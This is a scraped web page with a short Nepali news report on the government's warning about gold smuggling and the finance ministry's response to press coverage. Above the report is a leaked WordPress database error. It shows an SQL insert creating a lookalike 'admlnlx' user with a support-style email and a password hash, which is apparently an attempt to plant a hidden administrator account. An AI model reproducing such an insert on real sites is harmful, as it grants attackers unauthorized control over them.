WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCw6iZeib4NgVSVUFqwCoKu2HWQwrG0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 23:23:46', '', 'admlnlx', 'admlnlx')
काठमाडौँ, माघ ४ –
सरकारले सुन तस्करीमा संलग्न दोषीलाई कडा कारबाही गर्ने चेतावनी दिएको छ ।
उपप्रधानमन्त्री कृष्णबहादुर महराले हालै सुन बरामद भएको घटनाको गहन अनुसन्धान गरी दोषीमाथि कडा कारबाही गर्न अर्थमन्त्रालयका सचिव र भन्सार विभागका अधिकारीलाई निर्देशन दिनुभएको छ ।
मन्त्रालयले आज विज्ञप्ति जारी गरी सुन बरामद भएको घटनालाई लिएर मन्त्री महराको चरित्र हत्या गर्ने ढङ्गले समाचार प्रकाशन भएकामा गम्भीर ध्यानाकर्षण भएको जनाउँदै राजनीतिक पूर्वाग्रह राखेर त्यसो गरिएकामा खेद प्रकट गरेको छ ।
मन्त्रालयले कर फछ्र्योट आयोग गठन गर्न नेपाल उद्योग वाणिज्य महाङ्घले माग गरेको तर त्यस सम्बन्धमा कुनै निर्णय नभएको पनि प्रस्ट पारेको छ । – रासस